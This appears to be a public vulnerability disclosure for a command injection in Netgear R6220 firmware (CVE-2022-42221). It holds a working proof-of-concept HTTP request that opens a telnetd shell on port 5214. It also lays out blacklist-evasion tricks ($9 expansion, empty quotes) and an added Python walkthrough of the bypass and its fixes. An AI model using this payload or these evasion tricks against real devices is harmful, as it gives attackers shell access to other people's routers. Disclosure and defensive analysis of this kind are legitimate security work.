CVE-2022-42221: CVE_Report/Netgear/R6220 at main · Cj775995/CVE_Report

Netgear R6220 v1.1.0.114_1.0.1 suffers from Incorrect Access Control, resulting in a command injection vulnerability.


Information

Vendor of the products: Netgear

Reported by: Chengjian([email protected]) & HuoXingpeng([email protected]) & ShaLetian([email protected])

Affected products: Netgear r6220 <= v1.1.0.114_1.0.1

Firmware download address: https://www.downloads.netgear.com/files/GDC/R6220/R6220-V1.1.0.114.zip

Vulnerability Description

The vulnerability is in /usr/sbin/setup.cgi.

The vulnerable code path is in sub_1AF88 (the decompiler's name for the function).

Here v4 receives the remote_passcode parameter, which is first filtered by the test_command_inject function. Although many characters are filtered out, & is not, so it can be used to splice in a second command. The check for the string /bin/sh can be bypassed with /$9bin/$9sh ($9 is an unset positional parameter and expands to nothing), and the check for telnetd can be bypassed with telne''td (the shell removes the empty quotes during quote removal).

After passing the check, the remote_passcode value is stored directly with nvram_set, read back with nvram_get and assigned to v7, and finally passed into the COMMAND function, which splices it into a command string and executes it without any further check.

The check is therefore bypassed and the injected command is executed.

POC

After logging in to the web interface, command injection can be achieved by capturing the request with Burp Suite and sending the following:

POST /setup.cgi??id=7c534ca23308d480 HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 345
Origin: http://192.168.1.1
Authorization: Basic YWRtaW46QWRtaW4x
Connection: close
Referer: http://192.168.1.1/USB_media.htm&todo=cfg_init
Cookie: sessionid=sid16174xxx73678xxx1962923992x
Upgrade-Insecure-Requests: 1

media_server=&itunes_server=&config_passcode=&media_server_name=ReadyDLNA&scan=0&h_media_server=enable&h_itunes_server=enable&remote_passcode=%26telne%27%27td+-l+%2F%249bin%2F%249sh+-p+5214+-b+0.0.0.0%26&h_scan=0&todo=iserver_allow_ctrl&this_file=USB_media.htm&next_file=USB_media.htm
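The bypass chain from the description, as an added worked example that is not part of the original report and is not Netgear's code: the script URL-decodes the remote_passcode value from the PoC body above, checks it against a hypothetical model of test_command_inject that encodes only what the write-up states (the strings /bin/sh and telnetd are rejected, & is not; the ";" and "|" entries in the model are an assumption, since the firmware's real list is not on the page), then hands the two disguised words to a real POSIX sh to show why a filter that matches literal bytes never sees them. It also shows the allowlist check and the quoting that would have kept the value inert at the sink.

```python
"""Added example (not from the original report): decode the PoC body, show why
the two blacklist bypasses survive a substring filter, and show what an
allowlist check or proper quoting would have done instead.

The blacklist model only encodes what the write-up states ("/bin/sh" and
"telnetd" rejected, "&" accepted). The ";" and "|" entries are an assumption;
the real test_command_inject() list is not on the page.
"""
import shlex
import subprocess
from urllib.parse import parse_qs

# PoC POST body from the write-up.
POC_BODY = (
    "media_server=&itunes_server=&config_passcode=&media_server_name=ReadyDLNA"
    "&scan=0&h_media_server=enable&h_itunes_server=enable"
    "&remote_passcode=%26telne%27%27td+-l+%2F%249bin%2F%249sh+-p+5214+-b+0.0.0.0%26"
    "&h_scan=0&todo=iserver_allow_ctrl&this_file=USB_media.htm&next_file=USB_media.htm"
)

BLOCKED_SUBSTRINGS = ("/bin/sh", "telnetd")  # named in the write-up
BLOCKED_CHARS = set(";|")                    # assumed; "&" is deliberately absent


def decode_remote_passcode(body: str) -> str:
    """Return remote_passcode as the CGI sees it after URL decoding."""
    return parse_qs(body, keep_blank_values=True)["remote_passcode"][0]


def blacklist_filter(value: str) -> bool:
    """Model of test_command_inject(): True means the value is accepted.
    It matches literal bytes before any shell interprets them, which is the
    root of the bypass."""
    if any(ch in BLOCKED_CHARS for ch in value):
        return False
    return not any(bad in value for bad in BLOCKED_SUBSTRINGS)


def expand_in_sh(word: str) -> str:
    """Hand one word to a real sh and return it after parameter expansion and
    quote removal, i.e. what the shell behind COMMAND would execute.
    sh -c receives no positional arguments, so $9 is unset and expands to "",
    and the empty quotes in telne''td are dropped by quote removal.
    Only call this with harmless fragments; the whole injection would run."""
    proc = subprocess.run(["sh", "-c", "printf '%s' " + word],
                          capture_output=True, text=True, check=True)
    return proc.stdout


def expanded_is_blocked(word: str) -> bool:
    """True if the word, once the shell has expanded it, is one of the blocked
    strings: the filter inspected the wrong representation."""
    return expand_in_sh(word) in BLOCKED_SUBSTRINGS


def allowlist_filter(value: str, max_len: int = 32) -> bool:
    """The check the CGI should apply: a passcode is opaque data, so accept
    only a bounded run of ASCII letters and digits. Every metacharacter,
    quote and "$" is rejected regardless of how it is spelled."""
    return 0 < len(value) <= max_len and value.isascii() and value.isalnum()


def quoted_roundtrip(value: str) -> str:
    """If a shell string must be built at all, shlex.quote() turns the data
    into one literal word: sh hands it back unchanged, "$9" and "&" included."""
    return expand_in_sh(shlex.quote(value))


if __name__ == "__main__":
    injected = decode_remote_passcode(POC_BODY)
    print("decoded injection :", injected)
    print("blacklist accepts :", blacklist_filter(injected))
    for frag in ("/$9bin/$9sh", "telne''td"):
        print(f"{frag!r:14} -> {expand_in_sh(frag)!r}, "
              f"blocked after expansion: {expanded_is_blocked(frag)}")
    print("allowlist accepts :", allowlist_filter(injected))
    print("quoted, sh sees   :", quoted_roundtrip(injected))
```

The decoded value is a complete second command line delimited by the two & characters, and both disguised words come back from sh as exactly the strings the filter was meant to reject. The allowlist check rejects the value on the first non-alphanumeric byte, and with shlex.quote() applied at the sink the shell treats the entire value as a single literal argument, $9 unexpanded.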

Get Shell

First, confirm that port 5214 is closed by trying to connect to it with nc.

Then capture the request with Burp Suite, modify the parameters as shown above, and submit it.

Connect again: the connection to port 5214 now succeeds and a shell is obtained.
